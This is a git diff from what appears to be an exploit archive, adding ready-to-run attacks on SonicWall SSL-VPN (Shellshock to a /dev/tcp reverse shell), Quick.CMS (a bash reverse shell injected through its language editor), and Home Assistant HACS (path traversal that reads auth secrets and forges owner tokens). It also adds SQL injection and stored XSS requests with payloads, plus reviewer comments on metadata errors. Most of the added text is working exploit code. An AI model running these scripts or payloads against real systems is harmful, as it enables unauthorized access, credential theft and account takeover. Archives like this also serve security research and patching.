diff --git a/exploits/hardware/webapps/49499.py b/exploits/hardware/webapps/49499.py
new file mode 100755
index 000000000..52ff8e836
--- /dev/null
+++ b/exploits/hardware/webapps/49499.py
@@ -0,0 +1,105 @@ +# Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated) +# Exploit Author: Darren Martyn +# Vendor Homepage: https://www.home-assistant.io/ +# Version: < SMA 8.0.0.4 +# Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ + +#!/usr/bin/python +# coding: utf-8 +# Author: Darren Martyn +# Credit: Phineas Fisher +# Notes: +# This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team +# and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command +# execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns +# a trivial reverse shell using /dev/tcp. +# There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but +# implementing that is left as an exercise for the reader. I've seen a few approaches, and +# would be interested in seeing yours. +# There is another LPE that works only on some models which I also have removed from this. +# Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ +import requests +import sys +import telnetlib +import socket +from threading import Thread +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import time + +def banner(): + print """ + + 88 88 + "" 88 + 88 +8b d8 88 ,adPPYba, 88 88 ,adPPYYba, 88 +`8b d8' 88 I8[ "" 88 88 "" `Y8 88 + `8b d8' 88 `"Y8ba, 88 88 ,adPPPPP88 88 + `8b,d8' 88 aa ]8I "8a, ,a88 88, ,88 88 + "8" 88 `"YbbdP"' `"YbbdP'Y8 `"8bbdP"Y8 88 + + + + 88 + 88 + 88 + ,adPPYb,88 ,adPPYba, ,adPPYba, 8b,dPPYba, + a8" `Y88 a8" "8a a8" "8a 88P' "Y8 + 8b 88 8b d8 8b d8 88 + "8a, ,d88 "8a, ,a8" "8a, ,a8" 88 + `"8bbdP"Y8 `"YbbdP"' `"YbbdP"' 88 + SonicWall SSL-VPN Appliance Remote Exploit +Public Release (Jan 2021). Author: Darren Martyn. Credit +goes to Phineas Fisher for this. Stay inside, do crimes. 
+ """ + +def handler(lp): # handler borrowed from Stephen Seeley. + print "(+) starting handler on port %d" %(lp) + t = telnetlib.Telnet() + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", lp)) + s.listen(1) + conn, addr = s.accept() + print "(+) connection from %s" %(addr[0]) + t.sock = conn + print "(+) pop thy shell!" + t.interact() + +def execute_command(target, command): + url = target + "/cgi-bin/jarrewrite.sh" + headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)} + r = requests.get(url=url, headers=headers, verify=False) + return r.text + +def check_exploitable(target): + print "(+) Testing %s for pwnability..." %(target) + output = execute_command(target=target, command="cat /etc/passwd") + if "root:" in output: + print "(*) We can continue, time to wreck this shit." + return True + else: + return False + +def pop_reverse_shell(target, cb_host, cb_port): + print "(+) Sending callback to %s:%s" %(cb_host, cb_port) + backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port) + execute_command(target=target, command=backconnect) + +def hack_the_planet(target, cb_host, cb_port): + if check_exploitable(target) == True: + pass + else: + sys.exit("(-) Target not exploitable...") + handlerthr = Thread(target=handler, args=(int(cb_port),)) + handlerthr.start() + pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port) + +def main(args): + banner() + if len(args) != 4: + sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0])) + hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3]) + +if __name__ == "__main__": + main(args=sys.argv) \ No newline at end of file diff --git a/exploits/php/webapps/49294.txt b/exploits/php/webapps/49294.txt deleted file mode 100644 index c239fd3c3..000000000 --- a/exploits/php/webapps/49294.txt +++ /dev/null 
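Review bot: The header line `# Vendor Homepage: https://www.home-assistant.io/` does not belong to the SonicWall product named in the title; it is the same value the HACS entry 49495.py in this commit carries and looks copied, so it should name the SonicWall vendor page instead. The title says `8.0.0.0` while `# Version:` says `< SMA 8.0.0.4`, and there is no `# Date:` or `# Tested on:` line, which leaves a defender guessing which firmware is in scope. `#!/usr/bin/python` sits below the metadata comments, where it is only a comment, and the body uses Python 2 `print` statements without saying so; a line such as `# Requires: Python 2` would document that. I would also add a detection note to the header, e.g. `# Detection: GET /cgi-bin/jarrewrite.sh with a User-Agent header starting "() {"`, since that is what `execute_command` sends.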
@@ -1,37 +0,0 @@ -# Exploit Title: Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload -# Date: 12/20/2020 -# Exploit Author: Ramón Vila Ferreres (@ramonvfer) -# Vendor Homepage: https://contactform7.com -# Software Link: https://wordpress.org/plugins/contact-form-7/ -# Version: 5.3.1 and below -# Tested on: Windows 10 1909, Ubuntu 20.4 - -Explanation ---------------------------------------------------------------------- -ContactForm7 version 5.3.1 and below doesn't properly sanitize -uploaded filenames to prevent Arbitrary File Upload that can lead -to full server takeover in the worst-case scenario. - -This happens in the wpcf7_antiscript_file_name function, that fails -to sanitize the provided filename if it ends with any Unicode special -character ranging from U+0000 (null) to U+001F (us). - -The function matches both the file name and the file extension against -an exclusion regex. Appending any unicode special character to the -file extension results in a complete bypass of this verification (as -the regex doesn't match) leading to the Unrestricted File Upload. - -Exploit ---------------------------------------------------------------------- -1. Change the file extension of the file you want to upload (e.g: -"shell.php") to its equivalent with the special character ending (in -this case "shell.php" (appended U+0000)) - -2. Upload the file using ContactForm7 file upload feature in the -target website. - -3. Go to /wp-content/uploads/wpcf7_uploads/shell.php -Note the special character at the end -Note that the file upload location may vary as it is configurable. - -4. Now you have uploaded your file! \ No newline at end of file diff --git a/exploits/php/webapps/49468.txt b/exploits/php/webapps/49468.txt index f66b049f4..76e622687 100644 --- a/exploits/php/webapps/49468.txt +++ b/exploits/php/webapps/49468.txt 
@@ -4,6 +4,7 @@ # Vendor Homepage: https://collabtive.o-dyn.de/ # Version: 3.1 # Tested on: Windows & XAMPP +# CVE: CVE-2021-3298 ==> Tutorial <== diff --git a/exploits/php/webapps/49492.txt b/exploits/php/webapps/49492.txt new file mode 100644 index 000000000..25247c32d --- /dev/null +++ b/exploits/php/webapps/49492.txt @@ -0,0 +1,15 @@ +# Title: BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting +# Exploit Author: LiPeiYi +# Date: 2020-12-18 +# Vendor Homepage: https://www.bloofox.com/ +# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1 +# Version: 0.5.1.0 -.5.2.1 +# Tested on: windows 10 + +Vulnerable paper: /admin/include/inc_content_articles.php + +Steps to reproduce: + +1: Log in with a valid username and password. Navigate to the "articles" tab on the left-hand side. +2: Add the new post and then add the payload "payload: " in "text" parameter and click on save button. Post Saved successfully. +3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies. \ No newline at end of file diff --git a/exploits/php/webapps/49493.txt b/exploits/php/webapps/49493.txt new file mode 100644 index 000000000..07aa68b2d --- /dev/null +++ b/exploits/php/webapps/49493.txt 
@@ -0,0 +1,30 @@ +# Exploit Title: Online Grading System 1.0 - 'uname' SQL Injection +# Date: 2021-01-28 +# Exploit Author: Ruchi Tiwari +# Vendor Homepage: https://www.sourcecodester.com/php/13711/online-grading-system-using-phpmysqli.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/onlinegradingsystem.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +--------------------------------------------------------------------------------- + +#parameter Vulnerable: uname +# Injected Request +POST /onlinegradingsystem/admin/login.php HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 122 +Origin: http://localhost:8080 +Connection: close +Referer: http://localhost:8080/onlinegradingsystem/admin/login.php +Cookie: PHPSESSID=mavnqgmmv1o0vtqld99vtdv1us +Upgrade-Insecure-Requests: 1 + +uname=ruchi'||(SELECT 0x4375526c WHERE 6468=6468 AND (SELECT 4401 FROM (SELECT(SLEEP(20)))ariq))||'&pass=admin&btnlogin= + +#Application will load after 20 minutes. +-------------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49494.py b/exploits/php/webapps/49494.py new file mode 100755 index 000000000..480274e9a --- /dev/null +++ b/exploits/php/webapps/49494.py 
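Review bot: The closing comment `#Application will load after 20 minutes.` contradicts the request body above it, which uses `SLEEP(20)`; MySQL's SLEEP takes seconds, so the line should read `#Application will respond after about 20 seconds.`. The entry stops at the injected request and says nothing about the fix; the server-side code is not shown here, but the payload shape suggests `uname` is concatenated into the login query, so a line such as `# Fix: pass uname and pass to admin/login.php's query as bound parameters of a prepared statement` would make the entry usable for whoever has to patch it. The `Cookie: PHPSESSID=` value looks like a session id captured from the author's own test and would be better replaced with a placeholder.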
@@ -0,0 +1,71 @@ +# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) +# Date: 2020-12-28 +# Exploit Author: mari0x00 +# Vendor Homepage: https://opensolution.org/ +# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip +# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ +# Version: <= 6.7 +# CVE : CVE-2020-35754 + +#!/usr/bin/python3 + +import requests +import sys +from termcolor import colored +from time import sleep + +print(colored('''###########################################################''',"red")) +print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) +print(colored('''###########################################################''',"red")) +print("") + +if len(sys.argv) != 6: + print((colored("[~] Usage : python3 quickpwn.py ","red"))) + print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red"))) + exit() +url = sys.argv[1] +username = sys.argv[2] +password = sys.argv[3] +IP = sys.argv[4] +PORT = sys.argv[5] + + +#Start session +s = requests.Session() +headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} + + +#Authenticate +print((colored("[+] Attempting user login","blue"))) + +login_data = { + "sEmail": username, + "sPass": password, + "bAcceptLicense": "1", + "iAcceptLicense": "true" + } + +login = s.post(url+"admin.php?p=login", login_data, headers=headers) +sleep(0.5) + + +#Exploit +print((colored("[+] Adding shell command","blue"))) +payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" + +shell = { + "sOption": "save", + "Back_end_only": payload +} + +exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) +sleep(1) + +#Triggering reverse shell (three times just in case) +print("") +print((colored("[+] 
Triggering the shell. Go nuts!","green"))) +r = s.get(url+"admin.php?p=languages", headers=headers) +sleep(1) +r = s.get(url+"admin.php?p=languages", headers=headers) +sleep(1) +r = s.get(url+"admin.php?p=languages", headers=headers) \ No newline at end of file diff --git a/exploits/php/webapps/49496.txt b/exploits/php/webapps/49496.txt new file mode 100644 index 000000000..755cefd04 --- /dev/null +++ b/exploits/php/webapps/49496.txt @@ -0,0 +1,18 @@ +# Exploit Title: MyBB Hide Thread Content Plugin 1.0 - Information Disclosure +# Date: 1/27/2021 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1430 +# Version: 1.0 +# Tested on: Windows 10 +# CVE: CVE-2021-3337 + +1. Description: +This plugin hides thread content until user replies to the thread. The information disclosure is hidden content can be viewed without replying. + +2. Proof of Concept: + +- Visit a post where content is hidden +- Click the reply or quote button below +Thread content will be displayed in the [quote] bracket without needing to reply \ No newline at end of file diff --git a/exploits/php/webapps/49497.txt b/exploits/php/webapps/49497.txt new file mode 100644 index 000000000..9e78899f5 --- /dev/null +++ b/exploits/php/webapps/49497.txt 
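Review bot: The script saves its payload into the English language entry through `admin.php?p=languages&sLangEdit=en` with `"sOption": "save"` and nothing visible restores the original `Back_end_only` value afterwards, so a system tested with it presumably keeps the injected line until someone edits the language file by hand. The header should say so, e.g. `# Note: persistently modifies the "Back_end_only" language entry - restore the original value after testing`, and name the fixed release next to `# Version: <= 6.7` if one exists. The first usage string, `"[~] Usage : python3 quickpwn.py "`, lists no parameters (possibly lost when the page was rendered), so only the example line documents the five arguments. `#!/usr/bin/python3` comes after the header comments and therefore has no effect as a shebang.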
@@ -0,0 +1,20 @@ +# Exploit Title: Simple Public Chat Room 1.0 - Authentication Bypass SQLi +# Exploit Author: Richard Jones +# Date: 2021-01-26 +# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +POST /chat/login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 +Connection: close +Referer: http://localhost/chat/index.php?attempt= +Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl +Upgrade-Insecure-Requests: 1 + +username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+-- \ No newline at end of file diff --git a/exploits/php/webapps/49498.txt b/exploits/php/webapps/49498.txt new file mode 100644 index 000000000..a64b97dcb --- /dev/null +++ b/exploits/php/webapps/49498.txt 
@@ -0,0 +1,23 @@ +# Exploit Title: Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting +# Exploit Author: Richard Jones +# Date: 2021-01-26 +# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 + +#Replicates across chat sessions.. + + +POST /chat/send_message.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 58 +Origin: http://localhost +Connection: close +Cookie: PHPSESSID=r2focevhk11aqka051gt26qfhl + +msg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1 \ No newline at end of file diff --git a/exploits/python/webapps/49495.py b/exploits/python/webapps/49495.py new file mode 100755 index 000000000..63f12d569 --- /dev/null +++ b/exploits/python/webapps/49495.py 
@@ -0,0 +1,86 @@ +# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover +# Date: 2021-01-28 +# Exploit Author: Lyghtnox +# Vendor Homepage: https://www.home-assistant.io/ +# Software Link: https://github.com/hacs/integration +# Version: < 1.10.0 +# Tested on: Raspbian + Home Assistant 2021.1.0 +# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/ + +# STEP 1: Run the exploit (python3 exploit.py host port) +# STEP 2: Copy the token printed and set in your browser's local storage with +# the key `hassTokens` + +import requests +import jwt +import json +import argparse + + +class HA: + def __init__(self, ip, port): + self.ip = ip + self.port = port + + def retrieveFile(self, f): + url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}' + with requests.Session() as s: + r = requests.Request(method='GET', url=url) + prep = r.prepare() + prep.url = url + try: + r = s.send(prep, verify=False) + except requests.exceptions.ConnectionError: + return + if r.status_code == 400 or r.status_code == 404: + return + return r + + def craftToken(self): + f = self.retrieveFile('.storage/auth').json() + + # Find owner + for user in f['data']['users']: + if user['is_owner']: + self.owner = user['id'] + break + else: + print("No owner found. 
Using first account") + self.owner = f['data']['users'][0]['id'] + + for token in f['data']['refresh_tokens']: + if self.owner == token['user_id']: + encoded_jwt = jwt.encode({'iss': token['id']}, + token['jwt_key'], + algorithm="HS256") + self.token = {'access_token': encoded_jwt, + 'token_type': 'Bearer', + 'refresh_token': token['token'], + 'expires_in': 1800, + 'hassUrl': f"http://{self.ip}:{self.port}", + 'clientId': token['client_id']} + return self.token + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Exploit a vulnerability in \ +HACS < 1.10.0 to gain admin access to an Home Assistant instance.") + parser.add_argument("host", type=str, help="IP of the HASS instance") + parser.add_argument("port", type=int, help="port of the HASS instance") + args = parser.parse_args() + + r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format( + ip=args.host, + port=args.port)) + if r.status_code != 404: + print("HACS found! Testing vulnerability...", end='', flush=True) + ha = HA(args.host, args.port) + if ha.retrieveFile('configuration.yaml'): + print(": VULNERABLE") + token = ha.craftToken() + if token: + print(f"Use the following 'hassTokens': {json.dumps(token)}") + else: + print("Unable to craft token") + else: + print(": Not vulnerable") \ No newline at end of file diff --git a/exploits/windows/local/49116.py b/exploits/windows/local/49116.py index 77ce33d1d..8ebe69c8d 100755 --- a/exploits/windows/local/49116.py +++ b/exploits/windows/local/49116.py @@ -1,5 +1,5 @@ # Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution -# Date: August 29, 2020 +# Date: 2020-08-29 # Exploit Author: CrossWire # Vendor Homepage: https://www.foxitsoftware.com/ # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English diff --git a/files_exploits.csv b/files_exploits.csv index d9cde1dd8..87a5e67a0 100644 --- a/files_exploits.csv 
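Review bot: The title names `(HACS) 1.10.0` as the affected release while `# Version: < 1.10.0` says 1.10.0 is the first release that is not affected; the title should carry the same `< 1.10.0` so that readers do not take 1.10.0 to be vulnerable. Because `craftToken` builds a working session from the `jwt_key` and refresh `token` values read out of `.storage/auth`, upgrading HACS alone would presumably not invalidate material that was read before the upgrade. I would add a header line such as `# Remediation: upgrade HACS to >= 1.10.0, then revoke all existing refresh tokens and re-authenticate` so the entry states that credential rotation is part of the fix.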
+++ b/files_exploits.csv 
@@ -55,13 +55,13 @@ id,file,description,date,author,type,platform,port
 356,exploits/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,dos,windows,
 357,exploits/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow (PoC)",2004-07-20,"Luigi Auriemma",dos,windows,
 358,exploits/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",dos,hardware,
-360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)",2004-07-22,bkbll,dos,multiple,80
+360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers (Denial of Service)",2004-07-22,bkbll,dos,multiple,80
 362,exploits/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,dos,windows,
 363,exploits/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",dos,hardware,
-365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,dos,windows,
+365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service",2004-07-23,Phuong,dos,windows,
 366,exploits/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,dos,windows,
 370,exploits/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,dos,linux,
-371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,dos,linux,
+371,exploits/linux/dos/371.c,"Apache - Arbitrary Long HTTP Headers Denial of Service",2004-08-02,anonymous,dos,linux,
 376,exploits/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,dos,windows,
 383,exploits/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service",2002-05-19,"Lunar Fault",dos,multiple,31337
 385,exploits/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,dos,windows,
@@ -184,8 +184,8 @@ id,file,description,date,author,type,platform,port
 1027,exploits/windows/dos/1027.c,"FutureSoft TFTP Server 2000 - Remote Denial of Service",2005-06-02,ATmaCA,dos,windows,
 1037,exploits/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,dos,multiple,
 1056,exploits/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,dos,multiple,
-1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)",2005-06-22,g30rg3_x,dos,php,
-1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)",2005-06-22,HaCkZaTaN,dos,php,
+1063,exploits/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,g30rg3_x,dos,php,
+1064,exploits/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users (Denial of Service)",2005-06-22,HaCkZaTaN,dos,php,
 1065,exploits/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)",2005-06-23,cybertronic,dos,windows,
 1067,exploits/windows/dos/1067.cpp,"TCP-IP Datalook 1.3 - Local Denial of Service",2005-06-25,basher13,dos,windows,
 1072,exploits/multiple/dos/1072.cpp,"Stream / Raped (Windows) - Denial of Service",2005-06-27,"Marco Del Percio",dos,multiple,
@@ -373,13 +373,13 @@ id,file,description,date,author,type,platform,port
 2057,exploits/windows/dos/2057.c,"Microsoft Windows - Mailslot Ring0 Memory Corruption (MS06-035)",2006-07-21,cocoruder,dos,windows,
 2059,exploits/hardware/dos/2059.cpp,"D-Link Devices - UPNP Stack Overflow Denial of Service (PoC)",2006-07-22,ub3rst4r,dos,hardware,
 2073,exploits/multiple/dos/2073.c,"libmikmod 3.2.2 - GT2 Loader Local Heap Overflow (PoC)",2006-07-25,"Luigi Auriemma",dos,multiple,
-2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)",2006-08-07,ratboy,dos,windows,
-2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)",2006-08-08,Elo,dos,windows,
+2124,exploits/windows/dos/2124.php,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-07,ratboy,dos,windows,
+2147,exploits/windows/dos/2147.pl,"XChat 2.6.7 (Windows) - Remote Denial of Service",2006-08-08,Elo,dos,windows,
 2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",dos,hardware,
 2160,exploits/windows/dos/2160.c,"OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)",2006-08-10,"Luigi Auriemma",dos,windows,
 2176,exploits/hardware/dos/2176.html,"Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)",2006-08-13,Qode,dos,hardware,
 2179,exploits/multiple/dos/2179.c,"Opera 9 - IRC Client Remote Denial of Service",2006-08-13,Preddy,dos,multiple,
-2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service (Python)",2006-08-13,Preddy,dos,multiple,
+2180,exploits/multiple/dos/2180.py,"Opera 9 IRC Client - Remote Denial of Service",2006-08-13,Preddy,dos,multiple,
 2194,exploits/windows/dos/2194.pl,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (1)",2006-08-16,Preddy,dos,windows,
 2195,exploits/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete",2006-08-16,nop,dos,windows,
 2204,exploits/windows/dos/2204.c,"Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (3)",2006-08-17,Preddy,dos,windows,
@@ -399,7 +399,7 @@ id,file,description,date,author,type,platform,port
 2524,exploits/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,dos,bsd,
 2541,exploits/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,dos,bsd,
 2542,exploits/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,dos,bsd,
-2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,dos,windows,
+2571,exploits/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service",2006-10-16,n00b,dos,windows,
 2586,exploits/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",dos,multiple,
 2587,exploits/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",dos,multiple,
 2597,exploits/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",dos,multiple,
@@ -408,7 +408,7 @@ id,file,description,date,author,type,platform,port
 2639,exploits/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",dos,bsd,
 2650,exploits/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",dos,windows,
 2672,exploits/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,dos,windows,
-2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,dos,windows,
+2682,exploits/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service",2006-10-30,x82,dos,windows,
 2695,exploits/multiple/dos/2695.html,"Mozilla Firefox 1.5.0.7/2.0 - 'createRange' Remote Denial of Service",2006-10-31,"Gotfault Security",dos,multiple,
 2700,exploits/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",dos,hardware,
 2708,exploits/windows/dos/2708.c,"NullSoft Winamp 5.3 - Ultravox-Max-Msg Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,dos,windows,
@@ -488,7 +488,7 @@ id,file,description,date,author,type,platform,port
 3182,exploits/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,dos,windows,
 3190,exploits/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,dos,windows,
 3193,exploits/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,dos,windows,
-3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,dos,osx,
+3200,exploits/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service",2007-01-25,MoAB,dos,osx,
 3204,exploits/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",dos,windows,
 3223,exploits/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",dos,cgi,
 3224,exploits/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",dos,windows,
@@ -1281,7 +1281,7 @@ id,file,description,date,author,type,platform,port
 10223,exploits/windows/dos/10223.txt,"TYPSoft FTP Server 1.10 - APPE DELE Denial of Service",2009-11-24,leinakesi,dos,windows,21
 10229,exploits/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",dos,multiple,
 10237,exploits/hardware/dos/10237.txt,"Allegro RomPager 2.10 - URL Request Denial of Service",2000-06-01,netsec,dos,hardware,80
-10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,dos,php,
+10242,exploits/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service",2009-11-27,Eren,dos,php,
 10243,exploits/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",dos,php,
 10257,exploits/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",dos,windows,21
 10303,exploits/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",dos,windows,
@@ -1755,7 +1755,7 @@ id,file,description,date,author,type,platform,port
